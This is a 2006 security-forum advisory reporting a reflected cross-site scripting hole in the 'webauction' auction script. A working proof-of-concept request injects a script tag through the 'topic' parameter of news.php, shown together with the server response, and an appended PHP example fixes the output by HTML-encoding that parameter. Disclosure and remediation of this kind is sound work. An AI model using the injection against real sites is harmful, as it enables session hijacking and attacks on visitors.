IT Security and Insecurity Portal

XSS webauction

Posted: Thu Mar 23, 2006 6:50 pm

Classics
Regular user
Joined: Mar 23, 2006
Posts: 6
Location: Nederland/Venlo

Code:
webauction <== Cross-Site Scripting Vulnerability
===================================
Information of Software:
Software: webauction
Site: box.s-w-web.net
Description: webauction is a simple Auction Script.
Risk: medium
===================================
Bug:
1) Cross-Site Scripting Vulnerability in the page news.php
The vulnerability is found in news, views method.
- HTTP Normal GET Request
http://[target]/[patch]/news.php
GET /[patch]/news.php HTTP/1.0
GET /webauction/news.php?topic=<script>var%20Classics=688625517;alert(Classics);</script> HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: box.s-w-web.net
Cookie: YA_SESSION_ID=72b28500516a05806562d9cc8a6acd2b
Connection: Close
HTTP/1.1 200 OK
Date: Thu, 23 Mar 2006 18:25:29 GMT
Server: Apache/1.3.34 (Unix) PHP/4.4.1
X-Powered-By: PHP/4.4.1
Connection: close
Content-Type: text/html
---------------------------------------------------------
Credit:
Author: Classics
greetz: all DTO and FD-Crew Leader
===================================
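
One way to fix the output reported above, added here as an example; it is not part of the original post or of webauction's own code. Only the `topic` parameter of news.php comes from the post; the function names and the page markup are hypothetical.

```php
<?php
// Added example: hypothetical stand-in for news.php. The real webauction
// source is not shown in the post, so every name other than the `topic`
// query parameter is an assumption.

// The response in the post declares no charset. Declaring one stops the
// browser from guessing an encoding for the page.
if (!headers_sent()) {
    header('Content-Type: text/html; charset=UTF-8');
}

// Before: request data written into the page unchanged, which is the
// behaviour the advisory reports for `topic`.
function render_topic_vulnerable(array $query): string
{
    $topic = $query['topic'] ?? '';
    return '<h2>News: ' . $topic . '</h2>';
}

// After: accept only a string (topic[]=x arrives as an array), bound its
// length, and HTML-encode at the point of output.
function render_topic_hardened(array $query): string
{
    $topic = $query['topic'] ?? '';
    if (!is_string($topic)) {
        $topic = '';
    }
    $topic = substr($topic, 0, 64);
    // ENT_QUOTES encodes both quote styles so the value is also safe inside
    // an attribute; ENT_SUBSTITUTE replaces invalid byte sequences (such as
    // a multi-byte character cut by substr) instead of returning ''.
    $safe = htmlspecialchars($topic, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<h2>News: ' . $safe . '</h2>';
}

// Constructed sample input: the query value from the request in the post,
// URL-decoded as PHP would deliver it in $_GET.
$sample = array('topic' => '<script>var Classics=688625517;alert(Classics);</script>');

echo render_topic_hardened($sample), "\n";
```

In a real page the call would take `$_GET` in place of `$sample`. If `topic` is meant to be a numeric identifier, validating it as an integer before use is stricter than encoding alone.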